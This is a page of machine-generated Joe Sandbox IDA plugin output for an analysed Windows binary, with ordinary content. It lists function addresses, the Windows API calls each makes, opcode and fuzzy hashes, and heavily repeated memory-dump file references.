Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 508fe060849a8588ce5736cd65db5f7c43d8361e721e97367a7ae8863d8010fc
Instruction ID: 6f71f69546db3a10aa37ea6bccd7b92915b16d4058a34bf8029178e6eecbe09c
Opcode Fuzzy Hash: 508fe060849a8588ce5736cd65db5f7c43d8361e721e97367a7ae8863d8010fc
Instruction Fuzzy Hash: CE322775A006059FC728CF69C580A6AB7F0FF48310B15C56EE89ADB3A2D7B4E941CB48

Function 0042AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0042AE5E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 351c37b7a0dca3f53722f89ba5a642581bae2cef219bf943603e8a67bd98906b
Instruction ID: 9d816294065e57a4bea797fb3ce4e706f9fc483d44d78c604313fc096bcd5ead
Opcode Fuzzy Hash: 351c37b7a0dca3f53722f89ba5a642581bae2cef219bf943603e8a67bd98906b
Instruction Fuzzy Hash: AEA15D60304224BBDB24BA2A6C88DBF365DDB55744B95452FFC01D22A1CA1D8C27A37F

Function 0046550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00464A1E,00000000), ref: 004655FD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00465629

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 409c62477c2d353e78551535d089b69c44fc3234259d0a980560590cb30f7e58
Instruction ID: 449f3f4af7efbd490196c6f09139c4c9a5929a6e42e9673b2c1ad470ea8fa54a
Opcode Fuzzy Hash: 409c62477c2d353e78551535d089b69c44fc3234259d0a980560590cb30f7e58
Instruction Fuzzy Hash: E441D571500609FFEB109E95CC85EBFB7BDEB40718F10406FF606A6240FA799E41DA6A

Function 0045EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045EA95
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0045EAEF
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0045EB3C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 29f0ae4a0a6cf49ae4fdfb15e9428211bcc367e9c6ee46230bd7e03f42e6f4a7
Instruction ID: ac125565102ba0c127476f32fead46f3b7204b3319e7359bc5e7a78e7098a372
Opcode Fuzzy Hash: 29f0ae4a0a6cf49ae4fdfb15e9428211bcc367e9c6ee46230bd7e03f42e6f4a7
Instruction Fuzzy Hash: 8D215E35A00218EFCB00DFA6E895AEEBBB4FF48314F1480AAE805A7355DB35E945CB54

Function 0044BEC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0043010A: std::exception::exception.LIBCMT ref: 0043013E
Part of subcall function 0043010A: __CxxThrowException@8.LIBCMT ref: 00430153

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0044BF0F
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0044BF3C
GetLastError.KERNEL32 ref: 0044BF49

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 318c35ed8e83ddec74841fb42882dfdcea0c13a624baefd1913132c539d08a7b
Instruction ID: c70806ef6ee797166c8a56cf9b5d688af1106b234b9521d3b3fb2badb8301123
Opcode Fuzzy Hash: 318c35ed8e83ddec74841fb42882dfdcea0c13a624baefd1913132c539d08a7b
Instruction Fuzzy Hash: 7711BFB1814304AFE718AF54DCC6D2BB7BCEB44714B20852FE44A97241DB75EC448B64

Function 0045702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0045704C
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0045708D
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00457098

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f193419da6e0bc3a3fe79261b3b0228a91d201c29f61622aaa6d33aa7ac3b4dd
Instruction ID: 2dec9abc79a776c9c6745ccd8961a1e9af9581b0f249ef4a0b87f0099aa73f03
Opcode Fuzzy Hash: f193419da6e0bc3a3fe79261b3b0228a91d201c29f61622aaa6d33aa7ac3b4dd
Instruction Fuzzy Hash: 99111E71E05228BFEB108FA9EC45BAFBBFCEB45B10F104166F910E7290D7745A058BA5

Function 0044BE31 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044BE5A
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0044BE71
FreeSid.ADVAPI32(?), ref: 0044BE81

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 0ef4d7ba842dbd2831ca7fb7770eaade066dfddf7a656dc0d2144e2a1fbb3d04
Instruction ID: 1013ac9d4a1bbdaca7c198014ade179849d63d99559a5f613554ad270aef1f03
Opcode Fuzzy Hash: 0ef4d7ba842dbd2831ca7fb7770eaade066dfddf7a656dc0d2144e2a1fbb3d04
Instruction Fuzzy Hash: D2F01D76E00209BFDF04DFE4DD89AEEBBB8EF08305F50457AA602E3191E3749A449B14

Function 0045FD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0045FD71
FindClose.KERNEL32(00000000), ref: 0045FDA1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 313df974152c816e574ab5f0b393c3c8fb6a63fd6f8c4b28a2bfe278c93c2cdd
Instruction ID: 09bc676bd18a7dea29b065b90c9ddfee84eed9f00abbf0020a70a6639feec083
Opcode Fuzzy Hash: 313df974152c816e574ab5f0b393c3c8fb6a63fd6f8c4b28a2bfe278c93c2cdd
Instruction Fuzzy Hash: 9111A1326102009FD710DF29D845A2AB7E8FF84324F00852EF8AA97291DB74EC058B89

Function 0047F0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0048F352,?,?,?), ref: 0047F115

Part of subcall function 0042B155: GetWindowLongW.USER32(?,000000EB), ref: 0042B166

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0047F0FB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 346f051a5021b67556fad0681b8f58838727742431832cbf727f4745194e6ff0
Instruction ID: 945ec986d7dd90902773ed833f7b5c033876ebaec1c901051829458eb8c08a80
Opcode Fuzzy Hash: 346f051a5021b67556fad0681b8f58838727742431832cbf727f4745194e6ff0
Instruction Fuzzy Hash: 9101B531200214EBCB21EF19EC45FA63BB6FB85364F54853AF9190B2E1C7359C16DB59

Function 0047F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0047F47D
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0048F42E,?,?,?,?,?), ref: 0047F4A6

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 32acb3c4d39feb5a4cd2825e62f0c7a28011a34ab4861b1fb3e9d161a09c0d96
Instruction ID: a9e30132650bec285790797353f82905ed48285708b1146baa229990a73fa3dd
Opcode Fuzzy Hash: 32acb3c4d39feb5a4cd2825e62f0c7a28011a34ab4861b1fb3e9d161a09c0d96
Instruction Fuzzy Hash: 5BF03A72800118FFEF049F95DC099AE7FB9FF54351F10402AF902A2160D3B5AA55EB64

Function 0045D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0046C2E2,?,?,00000000,?), ref: 0045D73F
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0046C2E2,?,?,00000000,?), ref: 0045D751

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9787662e663348a4515403e36cee3fde4a3414e6473099f737dfef7dc3172dab
Instruction ID: e8aefc31bc3675d29806ed79234fc2f8059b6b2c42e7ac3bd004713ce920f87a
Opcode Fuzzy Hash: 9787662e663348a4515403e36cee3fde4a3414e6473099f737dfef7dc3172dab
Instruction Fuzzy Hash: 21F0A73550032DBBDB21AFA4CC49FEA776CBF49352F008167B905D6181D734D944CBA9

Function 0044B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0044B8C5
CloseHandle.KERNEL32(?), ref: 0044B8D7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2c394c7ce672657c49b7a174671f224359480655c913918880d0b241be851d41
Instruction ID: 1c3592b33acaacd6266cb0e2e1f3f1a3e59b7b67309e1b9f53ca0b324f151535
Opcode Fuzzy Hash: 2c394c7ce672657c49b7a174671f224359480655c913918880d0b241be851d41
Instruction Fuzzy Hash: 92E0EC72404611AFEB262B65EC09E77BBEDEF08315B10893FF49681470DB66ACD0DB54

Function 0047F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0047F59C
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0048F3AD,?,?,?,?), ref: 0047F5C6

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 8fd07ef259e211898ec173f66fe34ca914094dfe96c77491fde2012fa1063ae4
Instruction ID: e06bcf4eb3e4e0738da8bb57fb6f25702ef6344e4181d6f2debe7cb9381a6d24
Opcode Fuzzy Hash: 8fd07ef259e211898ec173f66fe34ca914094dfe96c77491fde2012fa1063ae4
Instruction Fuzzy Hash: 9EE08C30104219BBEB140F09DC0AFBA3B58EB00BA0F108537F91A880E1E7B488A0D668

Function 00438E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0041125D,00437A43,00410F35,?,?,00000001), ref: 00438E41
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00438E4A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a1aa797e358665ffedc2556254f2a77ccb0adf654f5556061052f59d0c1b7148
Instruction ID: 547d10c8c247fe4417008a0864d8fcbf2f7f5c38eb949d47920f31a16c0d1e35
Opcode Fuzzy Hash: a1aa797e358665ffedc2556254f2a77ccb0adf654f5556061052f59d0c1b7148
Instruction Fuzzy Hash: 07B09271444A08ABEB102BB1EC09B883F68EB98A63F004032FA1D440608B6354508A9A

Function 0043DF69 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b939e31403abc43ecdb3f98cbaa91aa28438cf1a9424fa2f1fa945b09557dd
Instruction ID: f4b9a099c98fd7f237f8bf932eee882004ca455f63dd5f9c549c644bc3052e0d
Opcode Fuzzy Hash: d1b939e31403abc43ecdb3f98cbaa91aa28438cf1a9424fa2f1fa945b09557dd
Instruction Fuzzy Hash: 84320521D2AF414DD7239639C922336A688AFBB3C4F15E737F815B5EA9EB2CC5835104

Function 0044113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86186df4a48872a8f439e6622f60626a5bbbb7b31b6c38b4d986ba2cfe20dda
Instruction ID: d8e914f1fbb9720522c731414a54b61049b6dd4dc4c4a2e432fcec916520ff41
Opcode Fuzzy Hash: f86186df4a48872a8f439e6622f60626a5bbbb7b31b6c38b4d986ba2cfe20dda
Instruction Fuzzy Hash: 4DB10420D2AF504DD72396399931336BB5CAFBB2D5F92D72BFC1A74D22EB2185834184

Function 004802AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00480352

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 17099a0492973b0aa52d915896580828fb4e934215e9744dfddaa9471d4a15a3
Instruction ID: 724bb282c1c01540f9a89d279d285fdb99f99fda321580a6d2ac22830c21d9a7
Opcode Fuzzy Hash: 17099a0492973b0aa52d915896580828fb4e934215e9744dfddaa9471d4a15a3
Instruction Fuzzy Hash: B7110431254255BFEB257A2C8C49BBE3614AB41760F24872BFD215A2E2CAA88D05D36D

Function 0047FE80 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042B155: GetWindowLongW.USER32(?,000000EB), ref: 0042B166

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0048F36A,?,?,?,?,00000000,?), ref: 0047FEF8

Memory Dump Source

